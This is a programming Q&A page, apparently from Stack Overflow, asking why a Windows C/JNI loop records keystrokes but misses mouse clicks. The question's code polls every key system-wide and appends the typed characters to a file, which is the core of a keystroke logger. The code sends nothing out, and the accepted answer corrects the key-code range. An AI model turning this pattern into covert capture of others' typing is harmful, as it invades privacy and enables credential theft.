# How to detect mouse click with JNI and C?

Tags: java, c, winapi, java-native-interface

Since catching click event with Java is limited to the JVM environment and cannot be seen, eg, on my browser or on my text editor, I adopted JNI in order to use C API of Windows and be more flexible.

I'm using Eclipse on Windows 7.

The following code catches with success every key I press on keyboard, except the left and right click of my mouse.

Do I need to use a special handling for the mouse clicks?

Thanks in advance :)

```
        while(1) {
        // to prevent 100% CPU usage
        Sleep(10);
        for(character=8; character<=222; character++) {
            if(GetAsyncKeyState(character) == -32767) {
                file = fopen(FileName,"a+");
                if(file == NULL)
                    return 1;
                if(file != NULL) {
                    if((character>=39) && (character<=64)) {
                        fputc(character,file);
                        i++;
                        fclose(file);
                        break;
                    } else if((character>64) && (character<91)) {
                        character += 32;
                        fputc(character,file);
                        i++;
                        fclose(file);
                        break;
                    }
                    else {
                        switch(character) {
                            case VK_LBUTTON:fputs("[LEFT CLICK]",file);i++;fclose(file);break;
                            case VK_RBUTTON:fputs("[RIGHT CLICK]",file);i++;fclose(file);break;
                            case VK_BACK:fputs("[BACKSPACE]",file);i++;fclose(file);break;

// follow all the others detections of the remaining virtual keys...
```

Comment: If you need something portable: https://github.com/kwhat/jnativehook

Answer (score 1, accepted):

`VK_LBUTTON == 0x01`, `VK_RBUTTON == 0x02`. You are checking the codes from 8 upwards.